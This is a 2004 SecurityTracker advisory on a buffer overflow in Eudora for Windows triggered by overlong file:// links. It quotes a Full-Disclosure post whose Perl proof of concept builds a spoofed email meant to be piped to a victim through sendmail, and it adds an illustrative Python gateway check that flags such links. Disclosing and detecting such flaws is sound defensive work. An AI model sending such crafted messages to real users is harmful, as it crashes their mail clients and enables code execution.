SecurityTracker.com

Category:  Application (E-mail Client)  >  Eudora
Vendors:  Qualcomm
Eudora Has Buffer Overflow in Loading 'file://' URLs
SecurityTracker Alert ID:  1010088
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  May 7 2004
Impact:  Not specified
Exploit Included:  Yes  
Version(s): 6.1, 6.0.3 and 5.2.1
Description:  A buffer overflow vulnerability was reported in Eudora in the processing of 'file://' URLs. The impact was not specified.

Paul Szabo reported that a remote user can send an e-mail containing a specially crafted 'file://' URL to a target user. If the target user clicks on the URL and the URL is longer than approximately 300 characters, the buffer overflow will be triggered, the report said.

The impact was not specified.

Windows-based versions are affected. Other platforms were not tested.

A demonstration exploit is provided in the Source Message.

Impact:  The impact was not specified.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.eudora.com/
Cause:  Boundary error
Underlying OS:  Windows (Any)
Reported By:  psz@maths.usyd.edu.au (Paul Szabo)
Message History:   None.


 Source Message Contents

Date:  Fri, 7 May 2004 12:10:59 +1000 (EST)
From:  psz@maths.usyd.edu.au (Paul Szabo)
Subject:  [Full-Disclosure] Eudora file URL buffer overflow

 

There is a buffer overflow in Eudora for Windows, verified on versions
6.1, 6.0.3 and 5.2.1. This is easily exploitable to run arbitrary code.
I do not know if this issue affects Eudora for Macs.

Demo:

#!/usr/bin/perl --
print "From: me\n";
print "To: you\n";
print "Subject: Eudora file URL buffer overflow demo\n";
print "X-Use: Pipe the output of this script into:  sendmail -i victim\n\n";
print "The following is a \"proper\" HTML URL, pointing to somewhere long:\n";
print "<x-html>\n";
print "<a href=\"C:\\", "A"x300, "\">\n";
print "Fake URL to http://anywhere/I/want</a>\n";
print "</x-html>\n";
print "Clicking above will crash Eudora.\n\n";
print "The following plain-text converted by Eudora into a clickable URL\n";
print "http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\n";
print "is for comparison: the user can hardly tell them apart.\n\n";

Cheers,

Paul Szabo - psz@maths.usyd.edu.au  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia
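
A mail-gateway check for the link pattern this advisory describes, added here as an example (not code from the advisory or from the source message): it flags anchors whose href is overlong, points at a local path or file: URL, or does not match the URL shown as link text. The 256-character limit, the reason labels and the sample body are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

MAX_HREF_LEN = 256  # assumed policy limit, below the ~300 characters in the report
LOCAL_TARGET = re.compile(r"^(file:|[A-Za-z]:[\\/]|\\\\)", re.I)  # file:, C:\, UNC
URL_HOST = re.compile(r"https?://([^/\s:]+)", re.I)

class AnchorCollector(HTMLParser):
    """Collect (href, visible text) for every closed <a> element."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.anchors, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = (dict(attrs).get("href") or "").strip()
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None

def audit_links(body):
    """Return one finding per suspicious anchor in an HTML or <x-html> body."""
    collector = AnchorCollector()
    collector.feed(body)
    collector.close()
    findings = []
    for href, text in collector.anchors:
        reasons = []
        if len(href) > MAX_HREF_LEN:
            reasons.append("long-href")
        if LOCAL_TARGET.match(href):
            reasons.append("local-target")
        # Link text shows a web URL, but the href goes to another host or to none.
        shown, actual = URL_HOST.search(text), URL_HOST.search(href)
        if shown and (not actual or actual.group(1).lower() != shown.group(1).lower()):
            reasons.append("text-href-mismatch")
        if reasons:
            findings.append({"href_len": len(href), "reasons": reasons})
    return findings

# Constructed sample: one anchor shaped like the report's demo, one ordinary link.
SAMPLE = ('<x-html>\n<a href="C:\\' + "A" * 300 + '">\n'
          "Fake URL to http://anywhere/I/want</a>\n</x-html>\n"
          '<a href="http://example.org/page">http://example.org/page</a>\n')
```

Calling audit_links(SAMPLE) reports only the first anchor; a gateway could quarantine or rewrite messages that produce findings.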

Copyright 2004, SecurityGlobal.net LLC